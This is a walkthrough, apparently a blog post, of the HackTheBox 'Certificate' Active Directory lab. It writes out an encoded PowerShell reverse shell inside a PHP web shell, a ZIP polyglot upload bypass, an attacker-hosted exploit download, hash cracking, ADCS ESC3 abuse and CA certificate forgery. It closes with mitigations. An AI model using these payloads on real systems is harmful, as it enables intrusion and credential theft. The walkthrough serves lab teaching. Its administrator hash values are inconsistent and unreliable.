Post

HackTheBox - Certificate Walkthrough

Posted
By bl4ckarch
10 min read
HackTheBox - Certificate Walkthrough

Certificate Banner

Machine Information

  • Name: Certificate
  • Difficulty: Hard
  • OS: Windows / Active Directory
  • IP: 10.10.11.71
  • Domain: certificate.htb

Synopsis

Certificate is a hard-difficulty Windows Active Directory machine that chains multiple advanced exploitation techniques. The attack path involves exploiting XSS in a web application, bypassing file upload restrictions using ZIP polyglots, extracting Kerberos pre-authentication hashes from PCAP files, abusing ADCS ESC3 certificate templates, and escalating privileges through SeManageVolumePrivilege to forge CA certificates for domain administrator access.

Reconnaissance

Nmap Scan

1
2

Export TARGET=10.10.11.71 
nmap -sCVT -v -A -p$(nmap -v -T5 -Pn -p- "$TARGET" | grep -E '^[0-9]+/tcp' | awk -F'/' '{print $1}' |paste -sd ',') "$TARGET" -oN certificate_nmap

Open Ports:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Key findings:

  • Active Directory Domain Controller
  • Web server running Apache with PHP
  • WinRM enabled (port 5985)
  • Domain: certificate.htb
  • DC: DC01.certificate.htb

Phase 1: Web Application Exploitation

Technology Fingerprinting

1

whatweb http://certificate.htb

Stack:

  • Apache 2.4.58 (Win64)
  • PHP 8.0.30
  • Bootstrap, jQuery
  • OpenSSL 3.1.3

Directory Enumeration

1
2
3

gobuster dir -u http://certificate.htb/ \
  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt \
  -t 100 -x php

Discovered endpoints:

1
2
3
4
5
6
7
8

/DB.php           - Empty response (database connection file)
/Index.php        - Main page
/Login.php        - Authentication
/register.php     - User registration
/upload.php       - Redirects to login (requires authentication)
/courses.php      - Requires authentication
/logout.php       - Session termination
/static/          - Static resources

XSS Discovery

Registered user with username: <script>alert("1")</script>

Result: XSS payload executes on login page, confirming Stored XSS vulnerability.

Upload Endpoint Analysis

Accessing /upload.php returns:

1
2

404 Not Found
No quizz found with the given SID.

Parameter fuzzing reveals the endpoint expects s_id (session/quiz ID):

1
2
3
4

gobuster fuzz -u "http://certificate.htb/upload.php?s_id=FUZZ" \
  -w 1-100.txt \
  -t 100 \
  -H "Cookie: PHPSESSID=ue6384fivhcr4ddv35gism94mf" | grep "Status=200"

Multiple quiz IDs (1-100) return status 200, providing file upload functionality.

Phase 2: File Upload Bypass & Initial Access

Upload Restriction Analysis

Direct PHP upload is blocked. The application validates file types and content.

ZIP Polyglot Attack

Create a valid ZIP containing benign content, then append a malicious ZIP:

Step 1: Create legitimate file

1
2

echo "hi blackarch" > blackarch.pdf
zip blackarch.zip blackarch.pdf

Step 2: Create reverse shell

1
2
3
4
5

cat > shell.php << 'EOF'
<?php
shell_exec("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA");
?>
EOF

Step 3: Create polyglot

1
2
3
4
5
6
7

# Place shell.php in my_files directory
mkdir my_files
mv shell.php my_files/
zip -r my_files.zip my_files/

# Concatenate ZIPs to create polyglot
cat blackarch.zip my_files.zip > ppolyglot.zip

Step 4: Upload and trigger

1
2
3
4
5
6

# Start listener
rlwrap nc -lvnp 1234

# Upload pepe.zip to any quiz (s_id=1-100)
# Access shell at:
# http://certificate.htb/static/uploads/<hash>/my_files/shell.php

Shell obtained as: xamppuser

Phase 3: Database Enumeration & Credential Extraction

Database Credentials

Reading /xampp/htdocs/certificate.htb/db.php:

1
2
3

$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user';
$db_passwd = 'cert!f!c@teDBPWD';

User Enumeration

1
2
3

C:\xampp\mysql\bin\mysql.exe -u 'certificate_webapp_user' \
  -p'cert!f!c@teDBPWD' \
  -e 'use certificate_webapp_db; select * from users;'

Key users identified:

IDNameUsernameEmailRoleHash
1Lorra ArmessaLorra.AAAlorra.aaa@certificate.htbteacher$2y$04$bZs2FUjVRiFswY84CUR8ve…
10Sara Brawnsara.bsara.b@certificate.htbadmin$2y$04$CgDe/Thzw/Em/M4SkmXNbu…

Password Cracking

1
2

hashcat -m 3200 -a 0 hash.txt \
  /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

Cracked:

  • sara.b@certificate.htb : Blink182

Hash type: bcrypt ($2y$) with cost factor 4 (very weak)

Phase 4: Active Directory Enumeration

Initial WinRM Access

1

evil-winrm -i 10.10.11.71 -u Sara.B -p 'Blink182'

BloodHound Collection

1
2
3
4
5

bloodhound-python -dc DC01.certificate.htb \
  -u 'Sara.B' -p 'Blink182' \
  -d certificate.htb \
  -c All \
  -ns 10.10.11.71

Note: Clock skew warning indicates time synchronization issue with DC.

Findings:

  • No immediate privilege escalation paths
  • Sara.B has standard user privileges
  • Need to find additional attack vectors

PCAP File Discovery

Found network capture: WS-01_PktMon.pcap

Phase 5: Kerberos Pre-Authentication Attack

PCAP Analysis with NetworkMiner

Opening the PCAP in NetworkMiner reveals Kerberos traffic for user Lion.SK.

Hash Extraction

1
2
3
4
5

# Convert PCAP to PDML format
tshark -r WS-01_PktMon.pcap -T pdml > sample.pdml

# Extract Kerberos hash
krb2john sample.pdml

Extracted hash:

1

Lion.SK:$krb5pa$18$Lion.SK$CERTIFICATE$$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Hash type: Kerberos 5 etype 18 Pre-Authentication

Hash Cracking

1

hashcat -m 19900 -a 0 hash3.txt /usr/share/wordlists/rockyou.txt

Cracked: !QAZ2wsx

Credentials:

  • User: Lion.SK
  • Password: !QAZ2wsx

User Flag

1
2

evil-winrm -i 10.10.11.71 -u Lion.SK -p '!QAZ2wsx'
type C:\Users\Lion.SK\Desktop\user.txt

Phase 6: ADCS ESC3 Certificate Template Abuse

Certificate Template Enumeration

1
2
3
4

certipy find -u 'Lion.SK' -p '!QAZ2wsx' \
  -dc-ip 10.10.11.71 \
  -vulnerable \
  -stdout

Vulnerable template discovered:

1
2
3
4
5
6
7

Template Name: Delegated-CRA
Certificate Authorities: Certificate-LTD-CA
Enabled: True
Enrollment Agent: True
Extended Key Usage: Certificate Request Agent
Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers
Vulnerabilities: ESC3 - Template has Certificate Request Agent EKU set

Key findings:

  • Lion.SK is member of Domain CRA Managers
  • Template allows requesting certificates on behalf of other users
  • ESC3 vulnerability enables privilege escalation

ESC3 Attack Chain

Reference: HackingArticles - ADCS ESC3

Step 1: Request Enrollment Agent Certificate

1
2
3
4
5

certipy req -u 'Lion.SK' -p '!QAZ2wsx' \
  -dc-ip 10.10.11.71 \
  -ca Certificate-LTD-CA \
  -target 'DC01.certificate.htb' \
  -template 'Delegated-CRA'

Output: lion.sk.pfx (enrollment agent certificate)

Step 2: Request Certificate On-Behalf-Of Ryan.K

1
2
3
4
5
6
7
8

certipy req -u 'lion.sk@CERTIFICATE.HTB' \
  -p '!QAZ2wsx' \
  -dc-ip '10.10.11.71' \
  -target 'DC01.CERTIFICATE.HTB' \
  -ca 'Certificate-LTD-CA' \
  -template 'SignedUser' \
  -pfx 'lion.sk.pfx' \
  -on-behalf-of 'CERTIFICATE\ryan.k'

Output: ryan.k.pfx

Step 3: Extract NT Hash

1

certipy auth -pfx ryan.k.pfx -dc-ip 10.10.11.71

Ryan.K credentials:

1
2

Username: ryan.k@certificate.htb
NT Hash: b1bc3d70e70f4f36b1509a65ae1a2ae6

Lateral Movement

1

evil-winrm -i 10.10.11.71 -u Ryan.K -H b1bc3d70e70f4f36b1509a65ae1a2ae6

Phase 7: Privilege Escalation to Administrator

Privilege Analysis

1

whoami /priv

Key privilege identified:

1

SeManageVolumePrivilege    Perform volume maintenance tasks    Enabled

SeManageVolumePrivilege Exploitation

Vulnerability: This privilege allows performing volume-level operations that can be abused to gain arbitrary write access to system directories.

Reference: Medium - Active Directory Pentesting

Exploit: SeManageVolumeExploit GitHub

Step 1: Upload Exploit

1

curl http://10.10.14.197/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe

Step 2: Execute Exploit

1

.\SeManageVolumeExploit.exe

Result:

1
2

Entries changed: 853
DONE

Step 3: Verify Write Access

1
2

echo "certificate box" > C:\Windows\htb.txt
type C:\Windows\htb.txt

Success! We now have write access to C:\Windows\.

Certificate Authority Private Key Export

With write access to C:\Windows\, we can export the CA certificate and private key:

1
2
3
4

mkdir C:\temp
cd C:\temp

certutil -exportPFX my "Certificate-LTD-CA" C:\temp\ca.pfx

Interactive prompts:

  • Enter password: (leave blank or set password)
  • Confirm password

Download certificate:

1

download ca.pfx

Administrator Certificate Forgery

Step 1: Forge Administrator Certificate

1
2
3

certipy forge -ca-pfx ca.pfx \
  -upn 'administrator@certificate.htb' \
  -out forged_admin.pfx

Step 2: Extract Administrator Hash

1
2
3
4

certipy auth -dc-ip '10.10.11.71' \
  -pfx 'forged_admin.pfx' \
  -username 'administrator' \
  -domain 'certificate.htb'

Administrator credentials:

1
2

Username: administrator@certificate.htb
NT Hash: d804304519fdgjtfy3c14cbf1c024408c6

Root Flag

1
2
3

evil-winrm -i 10.10.11.71 -u Administrator -H d804304519bf0143c14cbf1c024408c6

type C:\Users\Administrator\Desktop\root.txt

Attack Chain Summary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

┌─────────────────────────────────────────────────────────────────┐
│                    ATTACK PROGRESSION                           │
└─────────────────────────────────────────────────────────────────┘

Web Enumeration → XSS Discovery → File Upload (s_id parameter)
        ↓
ZIP Polyglot Bypass → PHP Shell Upload → xamppuser Access
        ↓
Database Enumeration → Password Hashes → Sara.B (Blink182)
        ↓
PCAP Analysis → Kerberos Pre-Auth Hash → Lion.SK (!QAZ2wsx)
        ↓
ADCS Template Enum → ESC3 Vulnerability → Enrollment Agent Cert
        ↓
On-Behalf-Of Request → Ryan.K Certificate → Ryan.K Hash
        ↓
SeManageVolumePrivilege → C:\Windows Write Access
        ↓
CA Certificate Export → Certificate Forgery → Administrator Hash
        ↓
Domain Administrator Access → Root Flag

Key Vulnerabilities & Mitigations

1. Stored XSS in Web Application

Vulnerability: No input sanitization on user registration

Impact: Session hijacking, cookie theft

Mitigation:

  • Implement Content Security Policy (CSP)
  • HTML encode all user-supplied input
  • Use HTTPOnly and Secure flags on cookies

2. File Upload Bypass via ZIP Polyglot

Vulnerability: Insufficient file validation

Impact: Remote code execution

Mitigation:

  • Validate file content, not just extension
  • Use anti-malware scanning
  • Execute uploads in sandboxed environment
  • Implement strict MIME type checking

3. Weak Password Hashing

Vulnerability: Bcrypt with cost factor 4

Impact: Rapid password cracking

Mitigation:

  • Increase bcrypt cost to minimum 12
  • Implement rate limiting on login
  • Use unique salts per password

4. Hardcoded Database Credentials

Vulnerability: Credentials in db.php

Impact: Full database access

Mitigation:

  • Use environment variables
  • Implement least-privilege database access
  • Rotate credentials regularly

5. Exposed Network Captures

Vulnerability: PCAP file with Kerberos pre-auth

Impact: Offline password cracking

Mitigation:

  • Secure network captures with proper ACLs
  • Use strong Kerberos pre-authentication passwords
  • Implement Kerberos armoring (FAST)

6. ADCS ESC3 Misconfiguration

Vulnerability: Certificate Request Agent template accessible

Impact: Impersonation of any domain user

Mitigation:

  • Restrict enrollment agent templates
  • Implement manager approval
  • Audit certificate template permissions
  • Remove unnecessary EKUs

7. SeManageVolumePrivilege Abuse

Vulnerability: Excessive privilege assignment

Impact: System directory write access

Mitigation:

  • Follow principle of least privilege
  • Restrict SeManageVolumePrivilege to administrators only
  • Monitor privilege usage with logging

8. CA Private Key Exportable

Vulnerability: CA certificate private key can be exported

Impact: Complete domain compromise via certificate forgery

Mitigation:

  • Use Hardware Security Module (HSM) for CA keys
  • Mark CA private keys as non-exportable
  • Implement strong physical and logical security
  • Enable CA auditing and monitoring

Tools Used

  • nmapautomator - Automated port scanning
  • gobuster - Directory and parameter fuzzing
  • evil-winrm - Windows Remote Management client
  • hashcat - Password hash cracking
  • certipy-ad - ADCS abuse and certificate operations
  • bloodhound-python - Active Directory enumeration
  • tshark/krb2john - Kerberos hash extraction from PCAP
  • NetworkMiner - Network traffic analysis

Timeline

  1. Web Enumeration - Discovered upload endpoint with parameter fuzzing
  2. XSS Discovery - Stored XSS in registration form
  3. File Upload Bypass - ZIP polyglot technique for PHP shell
  4. Database Access - Extracted credentials from db.php
  5. Password Cracking - Obtained Sara.B access
  6. PCAP Analysis - Extracted Lion.SK Kerberos hash
  7. User Flag - Accessed as Lion.SK
  8. ADCS ESC3 - Abused certificate template for lateral movement
  9. Privilege Enumeration - Identified SeManageVolumePrivilege
  10. CA Certificate Theft - Exported CA private key
  11. Certificate Forgery - Generated Administrator certificate
  12. Root Flag - Achieved Domain Admin access

Lessons Learned

  1. Defense in Depth - Multiple vulnerabilities were chained; a single fix would have prevented the attack
  2. ADCS Security - Certificate templates require careful configuration
  3. Privilege Management - Excessive Windows privileges enable powerful attacks
  4. Network Monitoring - PCAP files should be treated as sensitive data
  5. Input Validation - All user input must be validated, including file uploads
  6. Credential Hygiene - Strong passwords and secure storage are critical

Disclaimer: This writeup is for educational purposes only. Perform penetration testing only on systems you own or have explicit permission to test.

Date: October 2025

Writeup
xss file-upload-bypass zip-polyglot adcs esc3 certificate-request-agent kerberos-preauth pcap-analysis semanagevolumeprivilege certificate-forgery bcrypt-cracking evil-winrm certipy bloodhound
This post is licensed under CC BY 4.0 by the author.